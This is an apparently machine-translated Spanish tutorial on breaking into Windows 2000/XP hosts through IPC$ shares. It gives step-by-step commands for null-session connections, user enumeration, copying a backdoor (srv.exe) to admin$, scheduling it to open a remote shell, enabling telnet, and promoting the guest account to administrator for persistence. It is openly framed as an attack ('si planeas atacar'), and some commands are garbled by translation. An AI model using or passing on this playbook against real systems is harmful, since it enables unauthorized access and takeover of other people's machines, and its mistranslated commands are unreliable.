1) Establezca una conexión vacía:
net use \\IP\ipc$ "" /user:"" (Asegúrese de tener en cuenta: esta línea de comando contiene 3 espacios)
2) Establecer una conexión no nula:
net use \\IP\ipc$ "contraseña" /usuario:"nombre de usuario" (también tiene 3 espacios)
3) Asignar el valor predeterminado *** share:
net use z: \\IP\c$ "contraseña" /usuario:"nombre de usuario" (puede asignar la unidad c de la otra parte a su propio disco z, y así sucesivamente para otros discos)
Si se ha establecido ipc$ con el objetivo, puede acceder directamente a él con IP+letra de unidad+$. El comando específico es net use z: \\. IP\c$
4) Eliminar una conexión ipc$
net use \\IP\ipc$ /del
5) Eliminar ***mapeo compartido
net use c: /del elimina la unidad c asignada, y así sucesivamente para otras unidades
net use * /del elimina todo, aparecerá un mensaje que le pedirá que presione y para confirmar
3 Ver el * del host remoto **Recursos compartidos (pero no puede ver los recursos compartidos predeterminados)
net view \\IP
4 Ver los recursos compartidos del host local (puede ver el ***recurso compartido local predeterminado)
net share
5 Obtenga la lista de nombres de usuario del host remoto
nbtstat -A IP
6 Obtener lista de usuarios del host local
usuario de red
7 Ver la hora actual del host remoto
hora neta \\IP
8 Mostrar el servicio actual del host local
net start
9 Iniciar/detener el servicio local
net iniciar nombre del servicio/y
net detener nombre del servicio/y
10 Asignación del recurso compartido remoto:
net use z: \\IP\baby
Este comando compartirá el recurso compartido llamado baby ***Los recursos compartidos se asignan a la unidad z
11 Eliminar ***asignación compartida
net use c: /del Eliminar la unidad c asignada, y así sucesivamente para otras unidades
uso de red * /del /yEliminar todo
12 Copiar archivos al host remoto
copiar \path \srv.exe \\IP\***nombre del directorio compartido, como por ejemplo:
copiar ccbirds.exe \\*.*.*.*\c copiará los archivos en el directorio actual al unidad c de la otra parte
13 Agregue tareas programadas de forma remota
a las \\ip nombre del programa, como por ejemplo:
a las \\127.0.0.0 11:00 love.exe
Nota: intente utilizar el formato de 24 horas. No es necesario agregar una ruta a la ruta de búsqueda predeterminada del sistema (como system32/); de lo contrario, se debe agregar la ruta completa
p>
14 Active telnet en el host remoto
Aquí se utiliza un pequeño programa: opentelnet.exe, disponible en los principales sitios de descarga, y se deben cumplir cuatro requisitos:
1) El objetivo tiene habilitado el uso compartido de ipc$***
2) Debe tener una contraseña de administrador y una cuenta
3) Si el objetivo abre el servicio RemoteRegistry, el usuario será autenticado por ntlm
4) Válido para WIN2K/XP, NT no ha sido probado
Formato de comando: OpenTelnet .exe \\ cuenta de servidor psw puerto de modo de autenticación NTLM
El ejemplo es el siguiente: c:\>OpenTelnet.exe \\*.*.*.* admin
strator "" 1 90
15 Activar usuario/unirse al grupo de administradores
1 cuenta net uesr /active:yes
2 cuentas netas de administradores de grupo local /add
16 Cerrar telnet del host remoto
También requiere un pequeño programa: ResumeTelnet.exe
Formato de comando: ResumeTelnet.exe \\server account psw
El ejemplo es el siguiente: c:\>ResumeTelnet.exe \\*.*.*.* administrador ""
17 Eliminar una conexión ipc$ establecida
net use \\IP\ipc$ /del
Nueve modos de intrusión clásicos
Este modo de intrusión es tan clásico que se presenta en la mayoría de los tutoriales de IPC, así que lo citaré. al autor original (no sé quién es el mayor)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
Esta es la dirección IP cuyo nombre de usuario es administradores y cuya contraseña está "vacía" (¿contraseña vacía? Vaya, tienes mucha suerte) escaneada con "Streamer". Si planeas atacar, puedes usar dicho comando para. Establezca una conexión con 127.0.0.1. Debido a que la contraseña está "vacía", no es necesario ingresar la primera comilla. El nombre de usuario está entre las siguientes comillas dobles. Ingrese administradores y el comando se completará con éxito.
Antes de copiar, asegúrese de utilizar el comando net view \\IP para verificar el estado de uso compartido de la otra parte
2. C:\>copiar srv.exe \\127.0.0.1. \ admin$
Primera copia de srv.exe, que está disponible en el directorio de Herramientas del transmisor ($ aquí se refiere al c:\winnt\system32\ del usuario administrador, también puede usar c$, d $ , es decir, unidad C y unidad D, depende de dónde desee copiar).
3. C:\>net time \\127.0.0.1
Verifique la hora y descubra que la hora actual de 127.0.0.1 es 2002/3/19 11:00 am. , comando completado con éxito.
4. C:\>at \\127.0.0.1 11:05 srv.exe
Utilice el comando at para iniciar srv.exe (el tiempo establecido aquí es más rápido que el hora del host, de lo contrario, ¿cómo puedes iniciarlo? Jaja)
5. C:\>net time \\127.0.0.1
¿Has verificado la hora nuevamente? Si la hora actual de 127.0.0.1 es 2002/3/19 11:05 a. m., prepárese para iniciar el siguiente comando.
6. C:\>telnet 127.0.0.1 99
Aquí se utilizará el comando Telnet. Tenga en cuenta que el puerto es 99. El puerto Telnet predeterminado es 23, pero usamos SRV para crear un Shell de 99 puertos en la computadora de la otra parte.
Aunque podemos utilizar Telnet, SRV es de un solo uso y debe activarse nuevamente la próxima vez que inicie sesión. ¡Así que vamos a construir un servicio Telnet! Esto requiere el uso de ntlm
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
Use el comando Copiar para cargar ntlm.exe al host (ntlm.exe también se encuentra en el directorio de Herramientas de "Streamer").
8. C:\WINNT\system32>ntlm
Ingrese ntlm para iniciar (C:\WINNT\system32> aquí se refiere a la otra computadora. La ejecución de ntlm realmente permite que este programa se ejecute en el ordenador de la otra parte). Cuando aparece "DONE", significa que ha comenzado normalmente. Luego utilice "net start telnet" para iniciar el servicio Telnet.
9. Telnet 127.0.0.1, luego ingrese el nombre de usuario y la contraseña para ingresar a la otra parte. ¡La operación es tan simple como operar en DOS! (Entonces, ¿qué quieres hacer? Simplemente haz lo que quieras, jaja)
Por si acaso, agregaremos la activación de invitados al grupo de administración
10. net user guest /active:yes
Activar el usuario invitado de la otra parte
11. C:\>net user guest 1234
Establecer la contraseña de invitado Cámbiela. a 1234, o la contraseña que desea configurar
12. C:\>net localgroup Administrators guest /add
Cambiar invitado a administrador^_^ (si la contraseña del administrador cambia, si la cuenta de invitado no ha cambiado, podemos usar el invitado para acceder a esta computadora nuevamente la próxima vez)
Además, también puede analizar el motivo según el número de error devuelto:
Error número 5, acceso denegado: Es muy probable que el usuario que estás utilizando no tenga privilegios de administrador primero.
Error número 51, Windows no encuentra la ruta de red: Hay una. problema con la red;
Error número 53. No se puede encontrar la ruta de red: la dirección IP es incorrecta; el destino no está encendido; el servicio lanmanserver de destino no está iniciado; filtrado de puertos);
Error número 67, no se puede encontrar el nombre de la red: su lanmanworkstation El servicio no se inicia o el destino ha eliminado ipc$;
Error número 1219, las credenciales proporcionó conflicto con el conjunto de credenciales existente: ya ha establecido un ipc$ con la otra parte, elimínelo y vuelva a intentarlo;
Error número 1326, nombre de usuario desconocido o contraseña incorrecta: el motivo es obvio;
Error número 1792, al intentar iniciar sesión, pero el servicio de inicio de sesión de red no se inició: el servicio NetLogon de destino no se inició;
p>
Error número 2242, este usuario la contraseña ha caducado: el objetivo tiene una política de cuenta que fuerza cambios periódicos de contraseña